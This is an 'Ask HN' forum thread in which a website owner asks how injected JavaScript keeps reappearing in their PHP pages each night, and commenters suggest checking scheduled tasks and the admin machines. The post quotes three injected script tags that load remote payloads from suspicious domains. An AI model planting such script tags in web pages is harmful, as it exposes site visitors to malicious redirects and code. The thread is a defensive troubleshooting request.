

Ask HN: website getting hacked through code injection - needhelp123

hi HN,
for the past 4-5 days every night my website is somehow hacked and some javascript codes which redirect to a php page are inserted in my code. The problem is i know the server is not compromised cause the only access to the server through RDP is allowed through my IP on the firewall. aside from that it's only open on port 80,110 and 25.<p>also the date modified on the php script being edited doesn't change. it stays the same even though they are adding code to it.  i've installed a malware inspector on the server and it didn't return anything.<p>i did some digging and made sure there are no "eval" code in my php sites and now i'm out of ideas. i remove the injection code but looks like every night at 12am it gets put back in somehow.<p>i looked at the IIS logs on the server and don't see any hits for those URLS. can you please help me and guide me on how to start troubleshooting this and pinpointing it down in my code to see where the attacker is getting in?<p>the code they inject is below:
&#60;script type="text/javascript" src="http://in-sss.ru/code/js.php?i=5837&#38;r=10568&#38;p=12914&#38;c=8"&#62;&#60;/script&#62;
&#60;script type="text/javascript" src="http://wap-ttd.in/code/js.php?i=5837&#38;r=10568&#38;p=12914&#38;c=8"&#62;&#60;/script&#62;
&#60;script type="text/javascript" src="http://mnogo-code.ru/code/js.php?i=5837&#38;r=10568&#38;p=12914&#38;c=8"&#62;&#60;/script&#62;<p>thanks
======
kimura
Given that it happens at exactly 12am, it is safe to assume that the machine
itself is infected with some kind or rogue software. Kill all unknown
processes in the machine. Get an updated virus/malware cleaner. Look at
scheduled tasks on the machine. Did you check registry entries? Good luck

~~~
needhelp123
so i did a clean virus and malware search and nothing was found. i don't think
this is on my server.

i know they are doing drive by injections but i just don't know how to find
out which page on my site they are using to do the injection

------
SpacemanSpiff
I've encountered malware where the computer being used to administer the site
was compromised, and the malicious code was injected periodically this way. So
make sure your personal computer, as well as the computers of anyone with
write access to the site is clean. Good luck.

